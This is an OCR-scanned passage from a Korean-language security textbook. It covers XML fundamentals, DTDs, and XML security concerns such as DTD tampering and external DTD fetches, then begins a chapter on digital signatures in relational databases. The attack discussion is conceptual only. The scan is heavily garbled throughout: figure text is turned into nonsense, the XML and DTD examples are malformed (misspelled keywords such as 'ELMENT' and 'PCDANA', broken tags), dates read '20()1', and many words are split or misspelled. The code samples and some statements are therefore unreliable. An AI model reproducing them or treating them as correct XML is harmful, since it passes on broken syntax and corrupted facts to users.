한 응용이라는것 을 모르고 있 다. SGML 은 수많은 쏘프트웨 어판매 업 체 들이 지 원하는 보편 
적 인 표준인바 이 표준은 자료를 표현하는 방법 이 아니 라 자료자체를 서술한다. SGML 은 
더 구조화된 환경을 제공한다. 임의의 SGML 문서는 임의로 겹쳐 쓰이여 다른 문서를 포 
함함으로써 보다 단순한 문건들로 복합문서들을 만들수 있게 한다. 

SGML 에 서 유일 하게 문제 로 되 는것 은 SGML 이 500페 지 가 넘 는 설 명 서 (표준 및 요구 
조항들)로서 너 무도 일 반적 이 고 너 무도 복잡하여 대 부분의 Web 열 람기 들이 처 리할수 없 
다는것이다. 그에 대한 방도는 제한과 부단한 적용이 필요한 HTML 을 확장하지 않는것 
이 였 다. 그리하여 사용자들이 자기 의 표식달기언어 를 만들수 있게 하는 흐름식메 타언어 
인 SGML 의 부분모임을 창조하는 과정에 새로운 언어인 XML 이 파생되였다. XML 의 설 
명서는 SGML 의 본래의 500페지 보다 훨씬 더 다루기 쉬운 50페지 로 제 한되 였다. 그러 나 



XML 은 누구든지 령 으로부터 표식달기언어 를 창조할수 있는 규칙 들로 구성 되 여 있 다. 
XML 은 또한 HTML 이 새 로운 메 타언어 에 조화될수 있게 구성된다(그림 30—1을 볼것). 


S 를 년요 
I 명떼원] 


그림 30-1. SGML 과 XML 의 구조 


XML 의 장점들 

많은 회사들이 기대를 걸고 XML 에 편승하고 있다. XML 은 많은 장점들을 제공하고 
있지만 이것들가운데서 많은것들이 HTML 에는 없었다. 이런 장점들은 다음과 같은것들 
이다 : 

• 단순성 XML 은 흔히 사람과 를퓨터 들이 쉽 게 읽 고 리해할수 있으며 콤퓨터 로 
쉽 게 처 리할수 있 다. XML 은 또한 복합자료구조들을 표현 할수 있 다. XML 은 분 
산쏘프트웨 어 기 술 (CORBA 와 DCOM 과 같은)보다 배 우기 쉬 우며 개 발시 간이 적 
게 든다. 

• 열린표준 XML 은 W 3 C 의 열린표준이며 세 계의 거의 모든 중요한 쏘프트웨 어 개 
발자들이 XML 을 인정한다. Microsoft , Oracle 및 IBM 은 《 아침해 가 어 디서 떠 오 
르는가에 대 해서 는 견해 일치를 보지 못할》수 있으나 자기들의 쏘프트웨어제품 
에 서 XML 열린 표준만은 일 치하게 지 원 한다. 

• 자료서술 XML 은 메타자료 또는 정보에 관한 서술자료를 쉽게 제공할수 있게 
한다. 이것은 자료채 취 또는 보다 능률적 인 탐색엔진들의 실천가능성을 열어 주 
어 소비자가 정보나 정보산생자를 찾을수 있게 도와 준다. 

• 출판편리성 XML 의 가장 큰 장점 들중의 하나는 설계 로부터 내 용을 분리할뿐아 
니라그 반대과정도 수행하는 능력이다. 내용관리는 타자기시대로부터 힘을 넣 
은 문제 로 되 여 왔으며 문서들이 수자식하부구조와 뒤섞이게 되면서 더 욱 중요 
하게 되였다. XML 은 내용을 다치지 않으면서 문서의 형식을 바끌수 있게 하며 
또 설계를 다치지 않으면서 내용을 바물수 있게 하는 중요한 해결책을 제공한다. 

XMLU =2 F 볼트 

XML 은 누구든지 평 으로부터 표식달기언어 를 창조할수 있게 하는 규칙 과 규약들로 
이 루어 진다. 결과 XML 문서 를 만들 때 문서 작성자는 자기 의 요소들을 만들고 그것 들에 
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자기가 좋아 하는 이름들을 불여 준다. 이런 식으로 XML 은 승용차부속품명세나 면담자 
명단과 같은 거의 모든 문서형태들을 서술하는데 쓰일수 있다. 


속성 

► <COMACTLIST> [ 

: ACT. TYPE= M business ,T > 

<FIRSTNAME> John </FIRSTNAME> 
<LASTNAME> Smith </LASTNAME> 
<EVL4n>John 예 lift! ( 행 otoKl ( 策 。 otn <EVLAU><L 


글래 그들 —</CONTACT> 


〈 CONTACT. TYPE= n persona 卜〉 

<FIRSTNAME> Jack </FIRSTNAME> 
<LASTNAME> Spratt </LASTNAME> 
〈 EMAIL〉j ackspr att@johndoe. com 〈 /EMAIL 〉 
</CONTACT> 

<?CONTACTLIST> 


나 jacK 

> Spratt </hA 
kspratt@johnd 

내용 


그림 30-2. XML 의 기초문장론 


그림 30_2에서 보는바와 같이 XML 의 문장론은 아주 쉬우므로 지어 프로그람전문 
가 아닌 사람들도 몇시간안으로 태그들을 개발할수 있다. 이 실례는 또한 형식이 잘된 
문서작성에 필요한 기본규칙들을 보여 준다. 형식이 잘된 문서는 그 문서가 처리되도록 
하는 규칙들의 최소모임에 준한것이다. 그림 30 — 2의 실례는 XML 에 대한 다음과 같은 
규칙들에 준하고 있다. 즉 : 


• 문서요소 매 문서 는 오직 하나의 최 상위준위 요소를 가져 야 한다. 실례 의 문서 요 
소 또는 뿌리 요소는《 CONTACTLIST > (면 담자명 단)이 다. 

• 요소경쳐쓰기 한 요소가 다른 요소안에서 시작되면 역시 그 요소안에서 끝을 맺 
아야 한다. 이 실례에서 한 행이 

< EMAIL > johnsmith @ johndoe . com </ CONTACT ></ EMAIL > 

과 같이 씌여 졌으면 :</ EMAIL > 끝태그가 </ CONTACT > 끝태그앞으로 나와야 하 
기때문에 그것은 유효하다고 볼수 없을것이다. 

• 시작태그와 끌태그 매개 요소는 시 작태 그와 끝태그를 다 가져 야 하며 요소의 이 
틈은 해당한 끝태그의 이름과 정확히 일치해야 한다. 요소이름들에서는 대소문 
자가 정 확히 구별되 여 야 한다. 

이 실례는 XML 이 아주 단순하지만 여러 면에서 엄밀하다는것을 말해 준다. 그러나 
이것은 하나의 문제거 리 로 되는것 이 아니 라 XML 의 실제적 인 통합능력의 하나를 의미하 
는것 이 다. 다시 말하여 그 통합능력 의 하나가 그대 로 다 작용하도록 하기 위하여 누구나 
다 해 당한 규칙들을 준수하여 야 한다. 
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문서형식정의 

리해할수 있는 태그들조차 그것들을 요구 하는 사람들에게 알려 지는 경우에야 비로 
소 실용적 인것으로 된다. 공통적 인 문서형식을 가지고저 하는 사용자그룹들은 XML 에서 
또 하나의 가치 있는 도구 즉 문서 형 식 정 의 (DTD) 를 리용한다. XML 의 이 측면은 정 보 교 
환을 위한 업계의 표준을 쉽게 정의할수 있게 한다. 그러므로 우의 실례는 그림 30 — 3 에 
서 보는바와 같이 DTD 다음에 올수 있다. 


해더 -^<?xml version = M 1.0 M ?> 

문서형 래 -^<!DOCTYPE CONTACTLIST 
선 언 [ 

〈ELEMENT CONTACTLIST (CONTACT )*〉 
nl s 〈[ELEMENT CONTACT (FIRSTNAME,LASTNAME,EMAIL)> 

요속 겨 7 분 <! ATTLIST CONTACT type (business | personal) 유 REQUIRED 〉 

정 의 하는 - ► <!ELMENT FIRSTNAME (#PCDANA)> 

Markup 선언 <!ELMENT LASTNME (#PCDANA)> 

<!ELMENT EMAIL (#PCDANA)> 

] 

그림 30-3. XML header 가 있는 DTD 

또한 DTD 들을 리용하여 아주 위력한 확인을 진행할수 있는것이다. 그림 30_3 의 
DTD 에 서 는 요소 CONTACT 를 이 루는 요소들사이 에 있는 반점 들을 리용하여 그다음(자 
식)요소들의 《순서》형식을 지적하게 된다. 그러므로 

<!一 Invalid element-> 

<CONTACT> 

<LASTNAME> Doe </LASTNAME> 

<FIRSTNAME> Jane </FIRSTNAME> 

<EMAIL> janedoe @ johndoe.com </EMAIL> 

</CONTACT> 

와 같은 요소를 첨부하려고 하는 경우에 새끼요소들의 순서가 DTD 에 표시되여 있지 않 
으므로 그 요소는 무효한것으로 간주될것이다. 새끼요소를 생략하거나 혹은 같은 새끼요 
소형 식 을 한번 이 상 포함하는것 도 또한 무효한것 으로 간주될 것 이 다. 

XML 이 단순하며 문서형 식 들을 정 의할수 있기때 문에 XML 은 대 화형영 업프로그람을 
작성하는데 필 요한 중요한 프로그람작성문제 들을 해 결 할 잠재 력 을 가진 다. XML 요소들과 
문서구조의 다목적모임 은 XML 응용프로그람 혹은 XML 어 휘 로 알려 져 있다. 재정，보건， 
화학 및 신문업 과 같은 기 업 들은 그 기 업 성 원들을 위한 자기 들의 기 업 용 XML 응용프로그 
람들을 작성하는 사업 에 이 미 큰 규모로 착수하였다. 실례 로 CML(Chemistry Markup 
Language) 와 OFX(Open Financial Exchange) 를 들수 있 다. 
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기타 XML 도구 


특정한 산업 그룹 혹은 문서류를 위한 XML 응용프로그람들을 작성하는것외 에 임의의 
XML 문서형 식 안에 서 쓰일 수 있는 XML 응용프로그람 또는 표준들은 끊임 없 이 개 발되 고 
있다. 이 응용프로그람들은 XML 문서들을 보다 쉽게 만들며 형식화하고 보안할수 있게 
한다. 다음과 같은 몇가지 실례들이 있다. 

• XLink . 새로운 《 XML 련결언어》는 다중련결목표들을 허용하므로 HTML 련결기 
구보다 훨씬 더 위 력한것 이 다. 

• XSL . 《 확장스타일쉬 트언어 》 (extensible Stylesheet Language ) 는 XML 문장론을 리 
용하여 강력한 문서스타일 쉬 트를 만들수 있 게 한다. 

• XML 스키마. XML 스키마에 대 한 공식적 인 개 념은 20()1 년 3월에 W 3 C 에 의 하여 
발표되 였 다. XML 스키 마는 DTD 들을 기 록하는데 서 보다 강력한 대 안으로 된 다. 

XML 의 보안문제 


인터네 트에서 와 마찬가지 로 XML 이 설계 될 때 도 정 보보안은 일 차적 인 관심 사로는 
물론 지어 이차적인 관심사로도 될수 없었다. 《보안》이라는 말은 XML 에 대하여 그것 
이 권고되 던 초기 에 프로그람작성실례 로 겨 우 명목상으로 출현하였 다. 그러 나 XML 은 자 
료를 보다 쉽게 읽고 조직 하고 보급할 전망을 안겨 준다. 

XML 은 파국적인 기술인가 

임의의 새 기술에서 중요한 문제거리의 하나는 그 파국적인 작용의 잠재력이다. 정 
보보안전문가들은 완성된 제품들을 좋아 하는 경향이 있으며 안전하고 불변적인 환경속 
에 있을 때 제일 위안을 느진다. XML 은 결코 완성된것이 아니며 거의 매달 새로운 표준 
을 도입하게 된다. XML 은 또한 인터네트의 전반적모습뿐아니라 다른 많은 기업 및 자료 
기 지응용프로그람에도 변화를 가져 온다. 

대체로 가장 큰 변화는 HTML 에 기초한 기술과 규약에서 생긴다. 이 기술과 그것과 
련관된 기반에는 결함들이 있다. 그러나 이 결함들은 체계관리자나 또는 정보보안전문가 
가 리해할수 있는것들이였다. 이 기반들에 대한 현존규약들은 일정한 한계까지는 아주 
홀륭하게 작용한다. 

XML 이 주는 영향의 가장 큰 실례는 HTML 이 자기자체만으로는 앞으로 더는 중시 
되지 않으며 XML 안에서 재형식화되는것이 주목할만하다는것이다. 본질상 XML 은 HTML 
의 개 발을 그자체 의 령역 까지 로 종식하였 으며 HTML 이 중요함에 도 불구하고 그것 을 어 
휘상태 로 제 한한다. 
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장황성과 과일크기 

XML 표식붙이기는 장황해 질수 있다. XML 은 본문형식이며 태그들을 리용하여 자료 
의 한계 를 정한다. 이 것 으로 하여 XML 파일 들은 대 부분 2진형식보다 언제 나 더 큰것 이 다. 
앞의 실례들에서 XML 태 그들은 파일의 크기를 쉽게 3배로 늘일수 있다. XML 제 안자들은 
디스크 공간이 이전만큼은 비싸지 않으며 자료를 정확하고 신속하게 압축하여 송신하는 
많은 방법 이 있 다는것 을 강조하고 있 다. 

파일 크기확장의 이 새 측면은 보상될 수 있지 만 그것 을 잘 계 획 해 야 하며 어 떤 부차 
적 인 실행요인으로 대 하지 말아야 한다. 어떤 회사들은 XML 로 구축된 테 라바이트이상의 
큰 자료를 전송하고 있다. 파일크기가 최소한 40~50%만 확장되여도 이런 큰 자료기지들 
에 어느정도 값 비싼 큰 영향을 줄수 있다. XML 에로의 이행이 계속되고 있으므로 각급 
정보기술실무자들과 경영자들은 이런 보다 큰 체계를 위한 기억공간 및 대역너비문제들 
을 중시 해 야 한다. 

다시 인테^트에 대하여 

XML 은 인터네 트를 리용하는 기 업응용프로그람들가운데 서 급속히 공통언어 로 되 여 
가고 있 다. XML 은 준비 되 는 차제 로 쉬 운 구매，은행업 및 기 타 기 능들을 감당해 야 한다. 
그러나 인터네트는 여전히 불안전하며 XML 은 그것을 개선하지 못할것이다. 사실 사람들 
은 인 터네 트로 전 달되 는 모든 자료를 읽 고 리해 하기 쉽 게 하는 방향에 서 XML 을 의 도적 
으로 리용하고 있 다. 

W 3 C 와 함께 거의 모든 주요판매업자들은 이 문제로 하여 XML 을 받아 들이려는 자 
기들의 노력이 수포로 돌아 갈수 있다는것을 알았다. 이 문제는 본질상 잘 알려 진 두 
보안문제 즉 비밀성과 인증에 귀착된다. 암호화는 보다 신중하고 사적인 자료의 비밀을 
보장하기 위하여 필 요한것 이 다. 다시 말하여 이 문제 는 바로 세 부준위 에 서 일 어 날수 있 
는 문제로 된다. 실례로 문서에서 정보를 끌어 내는 사용자는 볼 필요도 없는 정보를 호 
출할수도 있 다. 수자식 서 명 들은 확실 성，무결 성 및 부인 방지 를 보장하기 위하여 필 요하다. 

우선 주요판매업체들은 보안해결책들을 세워 XML 응용프로그람들에 대한 암호화 및 
수자식서명 을 보장하였다. 그때 로부터 주요판매 업체들과 각이한 실무그룹들은 XML 에서 
의 새 암호화와 수자식 서명 요구들에 대 한 제 안들을 신속히 추적 하고 있 다. 즉 : 

• 암호화 20()1 년 3월에 W 3 C 는 XML 암호화에 필요한 기술설명서를 발표하였다. 
설명서 에 의하면 W 3 C 실무그룹의 임무는《 암호화/복호화내 용 ( XML 문서 와 그 부 
분을 포함하는) 그리고 (1) 암호화된 내용， (2) 해당한 수신자가 그것을 복호화할 
수 있게 하는 정 보를 나타내 는데 쓰이 는 XML 문장론을 위한 공정 을 개 발하는 
것》이였다. 

• 수자식서명들 XML 서 명요구사항(지 금은 W 3 C 의 두번째 건으로 간주되 는)은 
XML 열쇠 관리기술설명서 ( XKMS ) 와 함께 처 리되 고 있다. VeriSign , Microsoft , 
Baltimore Technologies , Citigroup , IBM , IONA Technologies , PureEdge , Reuters 를 
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비롯하여 몇개의 주요 쏘프트웨 어판매 업 체들이 20()1 년 3 월에 XKMS 요구사항를 
을 제출하였다. 


DTD 와 새로운 보안문제 

임의의 새 로운 기술도입에서와 마찬가지 로 XML 의 통합은 공격，파괴 및 람용당하게 
될 보안허점들을 뚫어 놓게 될것이다. 아마도 가장 큰 보안위협은 XML 스키마, DTD 들 
그리고 지어는 XSL 스타일쉬트 (stylesheets) 들의 계획적인 및 자연발생적인 교체에서 오게 
될것 이 다. 산업그를속에서 응용프로그람 또는 어 휘의 창조는 모든 응용프로그람의 기초 
로 될 하나의 XML 응용프로그람이 있게 될것 이 라고 가정할수 있게 한다. 내 부와 외 부에 
서 사용하기 위하여 《 표본》 DTD 들 또는 스타일 쉬 트들을 회 사들이 사용할것 이 며 많은 
경 우에 요구하게 될 것 이 라고 가정 하는것 역 시 론리적 인것 이 다. 사소한 변화도 DTD 에서 
치명적인 오유를 산생할수 있으며 XML 처리과정을 큰 규모로 멈춰 세울수 있다. 이런 공 
격은 정교로울 필요가 없다. 크래커 (cracker) 는 선택속성을 필요한 속성으로 변화시킬수 
있 으며 한 회 사가 이 런 작은《 무해한》오유를 찾느라고 여 러 시 간을 허 비하는것 을 보 
면서 깨고소하게 웃을수도 있 다. 

한다하는 보안전문가가 자료의 보안을 위하여 기 정 속성 이 나 DTD 에 의 거하는 경 우 
에 는 어 떻게 되 겠는가. 자그마한 변화라도 특권자료의 엄청난 분량을 로출시킬수도 있다. 
접 근조종을 위하여 각이한 보안제품들이 XML 에 의거 한다면 어떻 게 되 겠는가. 자그마한 
오유가 망으로부터 회사전체를 격리시킬수 있으며 또는 망봉사로부터 제외시키려고 하는 
바로 그런 사람들에게 접근할수 있는 조건을 제공할수도 있다. 

DTD 들은 또한 다른 방법으로 리용될수도 있다. XML 문서의 머 리부 (header) 가 하나의 
URL 을 보유하여 망상에서 그밖의 DTD 에 로 경 로를 설정하는 경우에 의뢰기는 DTD 에 
접근하여 XML 객체를 평가해 야 한다. DTD 호스트봉사기가 방화벽뒤 에 있을 경우에 의뢰 
기 와 봉사기 사이에 통신 이 일 단 이 루어 지 면 방화벽 은 격 파될수 있 다. 

이 모든 공격 들 즉 문제 거 리 들은 콤퓨터체 계 들이 파괴 되 는 다른 방법 들과 관계 되 는 
아주 단순한것들이 다. 차후의 해 결책 들이 의 심할바 없 이 발표되 여 새 로운 보안이 각이한 
XML 도구모임들에 도입되지만 XML 의 열린특성은 이 덜 정 교한 공격들이 계속 문제거 리 
로 되게 할것이다. 특히 알맞는 대책을 세우지 못하여 자기 자료들을 보존하지 못하는 
보다 풋내기회사들의 경우에는 더욱 그렇게 된다. 

XML 계렬，이봇자식 및 사생아 

XML 은 틀림 없 이 기 술의 계 렬 (family) 이 지 만 특정 한 과업 을 위 한 모둘과 응용프로그 
탐의 끊임없는 개발은 수많은 의혹을 자아내고 있다. XML 암호화 즉 XSL 또는 Xlink 에 
대 한 일부 새 로운 기 술설명 서 들이 지 금 잘 작성되 여 있 다. 그러 나 주요 쏘프트웨 어판매 
업체들로부터 금융기관에 이르기까지의 주요 련관기관들은 아직도 토론 해야 할 많은 문 
제를 안고 있다. 다른 기술설명서들과 권고안들이 바로 지금 공개되고 있으며 더 많은것 
들이 가까운 몇해 안에 개 발될 것 이 다. 물론 이 미 XML 을 지 원 하는 쏘프트웨 어판매 업 자들 
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도 아주 많은것이다. 틀림없이 매개 새로운 모둘 또는 응용프로그람이 《공식적》이기때 
문에 의 심할바 없 이 XML 에 새 로 보충된것 들을 지 원 할 갱 신된 쏘프트웨어 들은 아주 많 
은것 이 다. 

XML 을 위한 새 로운 쏘프트웨어 가 개 발되 여 XML 이 현존 제 품들에 보충됨 에 따라 
《강화된》응용프로그람을 될수록 빨리 시장에 내놓으러는 움직임으로 하여 보안허점들 
은 커질것 이다. 실례 로 XML 의 통합이후에 열 람기 응용프로그람 및 자료기지응용프로그람 
과 함께 발전한 보안문제들을 생각해 보라. 이 런 경향은 가까운 앞날에도 계속될것 갈다. 

모든 요구，모둘 및 응용프로그람들이 XML 에 적용되면서 그 분야가 모두 혼란되여 
그 시도전반에 약간의 위험을 또 주게 될것 이 다. 또한 이것은 W 3 C 또는 각이한 산업그 
룹들이 모르게 진행될수는 없었다. 400개이상의 성원기관들로 구성된 업계제휴단체인 
RosettaNet 는 각이한 XML 응용프로그람들의 수렴 과정 에 대 한 청 원을 최 근에 제 기하였 다. 
그러 나 400성 원기 관이 XML 계를 대 표할수는 없고 모든 관계 단체 들이 간섭하므로 세계는 
좀 어려운 과정을 거처 이 수렴을 실현하지 않으면 안되는것이다. 

결 론 


XML 을 위한 각이한 표준，요구 및 묘둘에 기 초하여 지 금 많은 작업 이 진행 되 고 있 
으며 이 사업은 높은 속도로 성숙되여 가고 있다. 계속 전진하고 있는데 오유는 범하지 
말라. XML 은 이 미 존재 하고 있다. XML 은 정 보기 술을 통하여 회 사，산업 별 및 세계 적규 
모로 퍼 져 나가고 있 다. 그리 고 XML 은 전 자출판，자료기 지보관，전자문서 의 교환 및 응 
용프로그람통합에 큰 영향을 주고 있다. 그러므로 정보보안에 망라된 경영자들을 비롯한 
각급 경영자들은《성배》로 알려 진 XML 의 특성을 파악하는것이 중요하다. XML 확산 
의 이상한 측면의 하나는 이 《성배》를 드는 특전을 누리는 경우에는 한사람이 아니라 
모든 사람들이 《 성배》를 들어 야 한다는것 이 다. 성공하기 위하여 그리고 WWW 상에서 
와 전자상업 거 래 에서 XML 의 전망을 모든 사람들이 알도록 하기 위하여 사용자가 XML 
에 기 초하여 입 력할것 을 XML 은 흔히 요구하는것 이 다. XML 이 널 리 리용되 면서 정 보의 
보다 빠른 공개，주문의 보다 빠른 처 리 그리고 문건의 보다 빠른 람색 에서 사람들은 헤 
택 을 입 게 된다. 물론 이 성공의 큰 요인은 XML 통합 및 사용이 안전하게 진행 될수 있겠 
는가에 따라 좌우될것 이 다. 

보안 해결책으로서의 XML 

XML 을 위하여 처 리되여 야 할 모든 보안문제들외 에 앞에서 고찰하지 않은 경향 즉 
XML 이 보안해 결 책의 하나로 리용되 고 있다는것 을 민감한 보안전문가，프로그람작성 자 
또는 경영자는 실감하기 시작할수도 있다. 보안은 보건사업이나 자동차관리와 다를것이 
없다. 다시 말하여 보안은 자체의 독특한 어휘와 자료조직방법을 가지고 있다. XML 은 
정 보보안을 위한 일 반문서 의 기 틀을 보장하는데 쓰이 게 될 뿐아니 라 응용프로그람들과 콤 


473 



퓨터 체 계 들사이 에 서 각이 한 보안과업 들을 통합하는데 도 쓰이 게 된 다. 

사람들은 Microsoft Exchange 와 같은 보안련관프로그람들의 각이 한 측면에 서 이 경 향 
을 이미 파악하기 시작하였다. 이 경향이 지속되면서 보안전문가들이 XML 의 기초원리들 
을 각이한 보안해 결 책 들에 리 용하는 방법 을 리해하는것 은 더 욱 중요하게 될 것 이 다. 왜 냐 
하면 XML 이 각이한 보안구성 요소들속에 서 결 합력 있는 구성 요소로 될수도 있는 가능성 
이 충분하기때문이다. 

이제부터는 어디로 가야 하는가 

XML 세계는 요구성이 높은 세계이다. 그러므로 이 장에서는 XML 과 XML 보안문제를 
폭 넓 게 취 급하였 다. XML 을 적 용하여 가장 충분하고 안전한 응용프로그람을 작성하며 
XML 에 의존되는 자료를 구축하려면 프로그람작성자들, 경영자들 및 보안전문가들이 광 
범위한 문제들에 정통하여 야 한다. 스타일쉬트， DTD, 자료나무 및 초련결구조들은 수자 
식 세 계 의 보다 견고하고 보다 리용가치 있 는 하부구조에 서 모두 보편화되 게 될 것 이 다. 
방어 는 훌륭한 보안방책들을 유지 하기 위해서뿐아니 라 기술을 부단히 갱 신하기 위 해서도 
필요하게 된다. 

보다 많은 정 보를 위하여 XML 에 대 한 최 신정 보와 소식 을 제 공하는 Web 싸이트변종 
들이 있다. 고찰하기 좋은 곳은 W3C (월드 와이드 Web 협회) Web 싸이트 즉 WWW.W3.org 
이다. 또한 임의의 검색엔진에서 《XML》 을 찾게 되면 곧 그에 대한 많은 정보를 볼수 
있다. 사람들용 그 XML 이 시간이 감에 따라 보다 많은 정보를 더 빨리 보다 더 정확하 
게 검 색하는 그 공정 을 발전시켜 나가기 를 바랄뿐 이 다. 
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제 3 1 장. 관계형자료기지응용에서의 수자식서명 


마이크 아 프레보스트 


공개열쇠암호화와 공개열쇠 기반 ( PKI ) 이 인터네 트의 보안기 초로 인정 되 면서 부터 새 로 
운 보안제품들이 등장하고 있다. 그러나 이러한 제품들의 대부분은 응용자체보다도 상업 
적 인 응용을 위한 기 반과 관련한 문제들을 해 결하는데 기 본을 두고 있다. 실례 로 가상개 
별망(소비제 품들은 인증서 에 기 초한 인증과 공개열쇠 에 기 초한 열쇠교환을 지 원하기 시 
작하였다. SSL 은 Web 에서 사적비밀과 인증을 위한 표준이다. 이러한 류형의 기술들이 
절실히 필요한데 그것들은 모두 고도로 전용화되 여 있으며 응용에서는 그러한 기술들이 
눈에 보이지 않게 되여 있다. 

수자식서명 기술의 성격과 자료기지구동형응용에서의 그 리용은 일정한 정도의 응용 
통합을 요구한다. 수자식서명 의 광범한 리용에서 일 차적 인 기 술적난점 이 바로 통합단계 
이 다. PKI 프로그람작성은 그 복잡성으로 하여 그것을 개발해 나가는 몇사람만이 알고 있 
는《미지의 기술 》 (black art ) 로 남아 있다. PKI 통합개발과제는 많은 응용프로그람소유자 
들에 게 너 무나 비 싸고 위 험한것 으로 인정 되 여 있 다. 그리하여 기 관들은 복잡한 통합을 
실 행하지 않고 응용에 보안기 능을 추가하는 방향으로 초점 을 돌 리 는것 갈다. 그러 나 기 
반보안으로부터 응용보안에 로의 이 행 에서는 수자식서명 과 같이 보안기능을 응용 그자체 
에 더 쉽게 통합할수 있는 자료보안제품의 류형 이 늘어 나고 있다. 

이 장에서는 수자식서명 기능을 관계형자료기지 에 통합시키 는데 필요한 내 용들을 설명 한 
다. 먼저 수자식서명의 개념을 설명하고 수자식서명이 응용보안방책에서 노는 역할，관계형 
자료기지응용이 다른 환경들과 차이나는 리유，여 러가지 통합방법들의 일부 난점들에 대 하여 
설 명한다. 끝으로 관계 형 자료기 지 에 보관된 자료를 수자적 으로 서 명 하는 응용일 반해 결 방법 을 
고찰한다. 여기에서는 수자식서명을 응용에 통합할수 있는 아주 쉬운 방법을 제공한다. 


수자식서명의 개념 


관계형자료기지 에서 수자식서명은 자료무결성 또는 부인방지(례 로서 원본의 증명)를 
보증하는데 널리 리용된다. 수자식서명은 의미적 으로는 문서서명 과 류사하다. 그러므로 
수자식서명은 문서의 인쇄，서명，전달，보관의 필요성을 완전히 제거하거 나 감소시켜 업 
무공정 을 합리 화하는데 리 용된다. 수자적 으로 서명한 문서의 서명 자를 유지 하는 합법적 
인 체계에서는 모든 문제들이 구체화되여 가고 있다. 

수자식서명이 응용준위의 보안을 실현하는데서 필수적인 하나의 항목이라는것을 강 
조한다. 체계보안을 실현하는데서는 수자식서명과 함께 암호화，인증，권한부여，접근조종， 
방화벽，침 입탐지 와 갈은 다른 기 술들도 중요하게 리 용된다. 그러 나 수자식서명 은 다른 
보안기 술들로는 해 결할수 없는 중요한 보안봉사를 제 공한다. 
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트랜잭션의 분석 


응용보안을 론할 때 에는《 트랜잭 션》 ( transaction : 1.외부거 래 기록을 위 하여 말단 등 
에서 생성하여 콤퓨터체계 로 전송되 는 자료，2.자료기지 에 대 한 조회 나 갱 신조작의 렬로 
구성되는 처 리의 기본단위-역주)이 라는 용어가 자주 리용된다. 이 용어는 재정거래나 기 
업거 래 를 련상시키 는 매우 애매 한 용어 이 다. 때때 로《 문서》 ( document ) 라는 용어도 리 용 
된다. 당면한 목적 에 서 트랜잭 션(또는 문서)은 응용에 의하여 보관되 는 자료에 대 한 변경 
으로 귀 착되는 응용프로그람과 사용자사이의 어떠 한 교환을 의미한다. 자료기지응용에서 
트랜 잭 션 자료는 관계형자료기 지 에 보관된 다. 

그림 31_1에서와 같이 트랜잭션은 4단계로 나누어 진다. 매개 단계에는 고유한 보 
안요구가 있다. 그림 에서는 응용준위의 보안을 실현하기 위하여 수자식서명 이 어 떻게 리 
용되 는가를 보여 준다. 이 단계 들의 순서 는 응용프로그람구성 방식 에 따라 차이날수 있 다. 



그림 31-1. 트랜잭션의 4단계 


1단계: 자료입력 트랜잭션은 자료를 동반하므로 자료가 어디서든 시작되여야 한다. 
이 것은 사용자가 자료를 입 력화면에서 건반으로 입 력한다는것을 의미한다. 이 단계 에서 
응용프로그람은 보통 자료확인 즉 요구되 는 모든 자료마당이 응용프로그람에 리해될수 
있는 형 식 으로 되 여 있는가 하는것 만을 고려한다. 응용프로그람은 또한 어 떤 사용자가 
자료입 력화면 에 접 근하는것 을 막을수 있 어 야 한다. 

2단계: 자료전송 많은 응용프로그람에서 트랜잭션자료는 망을 통하여 중심응용프로 
그람봉사기 또는 자료기지봉사기 에 전송된 다. 응용프로그람은 전송도중에 트랜잭션자료 
가 변경되지 않는다는것을 담보해야 한다. 그리고 트랜잭션자료에는 신용카드번호 또는 
다른 사적비밀정보와 같은 중요한 정보도 포함될수 있다. 또한 응용프로그람은 트랜잭션 
자료가 의도한 목적지 에 전달되고 있다는것을 보증하여 야 한다. SSL 구약의 Web 기반응용 
에 광범히 리용되자면 이러한 요구들을 만족시켜야 한다. VPN 기술도 역시 이러한 봉사 
들을 제공할수 있다. 

3 단계: 접수 처리과정의 어떤 시점에서 응용 또는 응용프로그람봉사기는 트랜잭션 
을《접수》한다. 즉 트랜잭션은 필요한 모든 요구에 맞게 처 리된다. 트랜잭션접수과정은 
몇개의 요소들을 동반한다. 

• 자료확인 요구되는 모든 마당들이 응용프로그람에 리해될수 있는 형식으로 입력 
된 다. 

• 무결성 자료는 응용프로그람 또는 자료기지봉사기로 전송되는 도중에 변경되지 
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않는다. 

• 인증 사용자의 신원은 정확히 설정되여 있다. 

• 권한부여 인증된 사용자는 이 트랜잭션을 진행할수 있는 권한을 가진다. 

4단계: 보관 트랜잭션은 자료기지에 보관된 자료에 대한 변경으로 귀착되는 사용자 
와 응용프로그람사이의 호상작용으로 정의되기때문에 자료는 반드시 보관되여야 한다. 
많은 경우에 어떤 트랜잭션은 새로운 자료가 자료기지에 씌여 질것을 요구한다. 또한 어 
떤 트랜잭션들은 이미 있는 자료를 변경시키기만 한다. 어느 경우에나 응용프로그람은 
기억된 자료가 변경되거나 파피 또는 부당한 사용자가 변경하거나 파피하거나 볼수 없게 
보관될 필요가 있다. 이러한 공격들은 흔히 강한 접근조종절차와 좋은 여벌복사계획에 
의하여 방지될수 있다. 

증명 대 방지 

앞의 설명에서 생략된것은 트랜잭션보안요소이다. 접수단계 (3 단계)에서 다음의것을 
알수 있다. 

• 요구되는 모든 자료들은 접수할수 있는 형식으로 입력되여야 한다(확인). 

• 자료는 전송도중에 변경되지 말아야 한다(무결성). 

• 자료는 전송도중에 다른 사람에게 보여 지지 말아야 한다(사적비밀). 

• 업 무를 실행할수 있는 사용자의 신원이 설정 되 여 있어 야 한다(인증). 

• 인증된 사용자는 트랜잭 션을 실행할수 있는 허 가를 가진다(권한부여). 

기본적으로 모든 보안요구들이 만족되는것 갈지만 문제는 사용자가 이러한 내용을 
트랜잭션이 수행되는 대단히 짧은 시간주기에서만 안다는것이다. 일단 트랜잭션이 완성 
되면 이러한 지식은 없어 지며 다시 설정될수 없다. 왜냐하면 이러한 내용들이 트랜잭션 
자료와 함께 보관될수 없기때문이다. 그러나 수자식서명은 이러한 지식의 일부를 취하여 
보관할수 있게 한다. 

수자식서명은 암호화기술과 같은 방법으로 자료를 보호하지 않는다. 수자식서명은 
비합법적인 사용자들에게 자료를 숨기지 않는다. 이것은 자료암호화에 의하여 제공된다. 
수자식서명은 외부해커 또는 부당한 내부사용자에 의한 자료수정을 막지 못한다. 이러한 
문제는 인증과 접근조종에 의하여 제 공된다. 수자식서명은 응용프로그람이 보존하려는 
자료에 대 하여 다음의 두가지 문제 를 증명할수 있게 한다. 

• 무결성 자료는 서명된 때부터 수정되지 않는다. 

• 원본 서명자의 신원은 암호기법적으로 증명될수 있다. 

